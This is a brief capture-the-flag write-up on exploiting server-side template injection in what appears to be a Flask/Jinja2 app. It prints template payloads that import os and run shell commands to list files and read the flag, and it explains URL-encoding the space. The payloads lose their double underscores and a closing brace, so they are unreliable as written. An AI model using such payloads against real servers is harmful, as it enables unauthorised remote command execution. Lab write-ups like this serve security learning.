Can you exploit this simple mistake?

An easy challenge, i struggled with the #SSTI part as i wasn’t enconding the command properly. Using burpsuite to make it easier to manipulate the url i first tried:

`{{request.application.globals.builtins.import(‘os’).popen(“ls”).read()}}

This got me the listing for the folder, which presented a flag.txt file. I then tried to read that file with cat:

`{{request.application.globals.builtins.import(‘os’).popen(“cat flag.txt”).read()}}

This resulted in a server error. I then tried several other types of injection, but none of them worked. Until i remembered that the space in the cat command was probably causing the problem, and had to encode it as an url :

`{{request.application.globals.builtins.import(‘os’).popen(“cat%20flag.txt”).read()}

This prints the flag on the page.